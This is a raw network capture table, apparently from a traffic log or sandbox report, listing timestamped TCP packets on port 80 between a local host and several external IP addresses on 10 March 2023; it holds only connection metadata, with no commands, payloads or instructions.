                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916018009 CET4996680192.168.2.6104.218.10.254
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916033030 CET8049966104.218.10.254192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916084051 CET4996680192.168.2.6104.218.10.254
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916104078 CET8049966104.218.10.254192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916153908 CET4996680192.168.2.6104.218.10.254
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916171074 CET8049966104.218.10.254192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916224003 CET4996680192.168.2.6104.218.10.254
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916237116 CET8049966104.218.10.254192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916296959 CET4996680192.168.2.6104.218.10.254
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916306973 CET8049966104.218.10.254192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916394949 CET4996680192.168.2.6104.218.10.254
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916400909 CET8049966104.218.10.254192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.916451931 CET4996680192.168.2.6104.218.10.254
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.930368900 CET8049969185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.930454969 CET4996980192.168.2.6185.53.177.50
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.953484058 CET8049969185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:05.962443113 CET8049968107.180.98.101192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.170217037 CET8049969185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.170249939 CET8049969185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.170273066 CET8049969185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.170293093 CET8049969185.53.177.50192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.170331955 CET4996980192.168.2.6185.53.177.50
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.170402050 CET4996980192.168.2.6185.53.177.50
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.351800919 CET4997080192.168.2.6157.112.176.4
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.499018908 CET4994980192.168.2.6198.100.146.220
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.553700924 CET8049855104.196.26.65192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.553814888 CET4985580192.168.2.6104.196.26.65
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.561561108 CET4995380192.168.2.6210.140.73.39
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.633222103 CET8049970157.112.176.4192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.636455059 CET4997080192.168.2.6157.112.176.4
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.636986971 CET4997080192.168.2.6157.112.176.4
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.663100958 CET804996366.94.119.160192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.663510084 CET4996380192.168.2.666.94.119.160
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.897579908 CET8049891170.82.174.30192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.900512934 CET4989180192.168.2.6170.82.174.30
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.918256044 CET8049970157.112.176.4192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.989316940 CET8049970157.112.176.4192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:06.992548943 CET4997080192.168.2.6157.112.176.4
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.245040894 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.435599089 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.435846090 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.436412096 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.626888990 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.636883974 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.636949062 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637022972 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637070894 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637073040 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637113094 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637121916 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637125015 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637168884 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637170076 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637216091 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637217999 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637265921 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637267113 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637314081 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637316942 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637362003 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637362957 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.637408018 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.827855110 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.827898026 CET8049971173.254.28.29192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.827955008 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:07.827955961 CET4997180192.168.2.6173.254.28.29
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.344997883 CET8049951103.3.1.161192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.345153093 CET4995180192.168.2.6103.3.1.161
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.413160086 CET4997280192.168.2.6157.112.182.239
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.608546019 CET4996080192.168.2.664.125.133.18
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.696717024 CET8049972157.112.182.239192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.696850061 CET4997280192.168.2.6157.112.182.239
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.697365046 CET4997280192.168.2.6157.112.182.239
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.902405977 CET8049966104.218.10.254192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.902493954 CET4996680192.168.2.6104.218.10.254
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.980829954 CET8049972157.112.182.239192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.982151985 CET8049972157.112.182.239192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.982228994 CET8049972157.112.182.239192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.982268095 CET4997280192.168.2.6157.112.182.239
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.982294083 CET8049972157.112.182.239192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.982302904 CET4997280192.168.2.6157.112.182.239
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:08.982341051 CET4997280192.168.2.6157.112.182.239
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:09.981842041 CET8049965122.128.109.107192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:09.981954098 CET4996580192.168.2.6122.128.109.107
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:09.999291897 CET4996280192.168.2.696.91.204.114
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.617923975 CET4997480192.168.2.6143.204.9.84
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.638274908 CET8049974143.204.9.84192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.638504982 CET4997480192.168.2.6143.204.9.84
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.639014006 CET4997480192.168.2.6143.204.9.84
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.658648014 CET8049974143.204.9.84192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.658859015 CET8049974143.204.9.84192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.658941031 CET4997480192.168.2.6143.204.9.84
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.680061102 CET4997480192.168.2.6143.204.9.84
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.699887991 CET8049974143.204.9.84192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.700058937 CET8049974143.204.9.84192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.700268030 CET4997480192.168.2.6143.204.9.84
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.771790028 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.791603088 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.792736053 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.793155909 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.813087940 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.866902113 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.867052078 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.867120028 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.867173910 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.875950098 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.894870043 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.894921064 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.894953012 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.895009041 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.895008087 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.895046949 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.895076036 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.895153999 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.895200014 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.895243883 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.895296097 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896080017 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896117926 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896145105 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896173000 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896244049 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896296024 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896358967 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896578074 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896617889 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896644115 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896672964 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896673918 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896713972 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896785975 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.896828890 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915102005 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915144920 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915194988 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915234089 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915263891 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915311098 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915364027 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915412903 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915520906 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915569067 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915625095 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915672064 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915721893 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915786982 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915841103 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915873051 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915891886 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.915905952 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916023970 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916074038 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916096926 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916142941 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916214943 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916263103 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916337013 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916383028 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916435003 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916481018 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916547060 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916613102 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916699886 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916748047 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916829109 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916874886 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916934013 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.916981936 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917007923 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917052984 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917150021 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917196989 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917287111 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917331934 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917370081 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917418003 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917453051 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917499065 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917546034 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917589903 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917676926 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917726040 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917732954 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917772055 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917859077 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.917902946 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.918004990 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.918050051 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935287952 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935333014 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935401917 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935450077 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935544014 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935584068 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935584068 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935646057 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935697079 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935775042 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935820103 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935870886 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.935909033 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936047077 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936093092 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936141014 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936187029 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936256886 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936300993 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936369896 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936415911 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936562061 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936592102 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936615944 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936638117 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936744928 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936775923 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936846972 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936847925 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936885118 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936944008 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.936992884 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937051058 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937100887 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937185049 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937227964 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937272072 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937309027 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937341928 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937380075 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937486887 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937534094 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937562943 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937623978 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937679052 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937758923 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937797070 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937845945 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937936068 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.937983036 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938064098 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938116074 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938131094 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938179016 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938244104 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938288927 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938507080 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938538074 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938558102 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938581944 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938771963 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938844919 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938854933 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938889027 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938930988 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.938975096 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.939042091 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.939081907 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.939124107 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.939163923 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.939249039 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.939290047 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.939378023 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.939420938 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.939424992 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.939461946 CET4997580192.168.2.662.75.216.137
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.939481974 CET804997562.75.216.137192.168.2.6
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:10.939524889 CET4997580192.168.2.662.75.216.137
